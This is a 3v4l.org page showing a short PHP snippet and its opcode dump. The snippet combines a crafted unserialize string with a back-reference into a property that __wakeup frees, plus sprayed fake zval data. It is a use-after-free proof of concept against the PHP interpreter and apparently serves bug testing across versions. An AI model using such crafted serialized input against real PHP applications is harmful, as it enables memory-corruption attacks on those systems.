3v4l.org

run code in 300+ PHP versions simultaneously
<?php class evilClass { public $name; function __wakeup() { unset($this->name); } } $fakezval = pack( 'IIII', 0x00100000, 0x00000400, 0x00000000, 0x00000006 ); $data = unserialize('a:2:{i:0;O:9:"evilClass":1:{s:4:"name";a:2:{i:0;i:1;i:1;i:2;}}i:1;R:4;}'); for($i = 0; $i < 5; $i++) { $v[$i] = $fakezval.$i; } var_dump($data);
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 42) Position 1 = 18
Branch analysis from position: 18
2 jumps found. (Code = 44) Position 1 = 20, Position 2 = 14
Branch analysis from position: 20
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 14
2 jumps found. (Code = 44) Position 1 = 20, Position 2 = 14
Branch analysis from position: 20
Branch analysis from position: 14
filename:       /in/4RU61
function name:  (null)
number of ops:  24
compiled vars:  !0 = $fakezval, !1 = $data, !2 = $i, !3 = $v
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   10     0  E >   INIT_FCALL                                               'pack'
   11     1        SEND_VAL                                                 'IIII'
   12     2        SEND_VAL                                                 1048576
   13     3        SEND_VAL                                                 1024
   14     4        SEND_VAL                                                 0
   15     5        SEND_VAL                                                 6
          6        DO_ICALL                                         $4      
   10     7        ASSIGN                                                   !0, $4
   18     8        INIT_FCALL                                               'unserialize'
          9        SEND_VAL                                                 'a%3A2%3A%7Bi%3A0%3BO%3A9%3A%22evilClass%22%3A1%3A%7Bs%3A4%3A%22name%22%3Ba%3A2%3A%7Bi%3A0%3Bi%3A1%3Bi%3A1%3Bi%3A2%3B%7D%7Di%3A1%3BR%3A4%3B%7D'
         10        DO_ICALL                                         $6      
         11        ASSIGN                                                   !1, $6
   20    12        ASSIGN                                                   !2, 0
         13      > JMP                                                      ->18
   21    14    >   CONCAT                                           ~10     !0, !2
         15        ASSIGN_DIM                                               !3, !2
         16        OP_DATA                                                  ~10
   20    17        PRE_INC                                                  !2
         18    >   IS_SMALLER                                               !2, 5
         19      > JMPNZ                                                    ~12, ->14
   24    20    >   INIT_FCALL                                               'var_dump'
         21        SEND_VAR                                                 !1
         22        DO_ICALL                                                 
         23      > RETURN                                                   1

Class evilClass:
Function __wakeup:
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename:       /in/4RU61
function name:  __wakeup
number of ops:  2
compiled vars:  none
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
    6     0  E >   UNSET_OBJ                                                'name'
    7     1      > RETURN                                                   null

End of function __wakeup

End of class evilClass.

Generated using Vulcan Logic Dumper, using php 8.0.0


preferences:
178.12 ms | 1396 KiB | 19 Q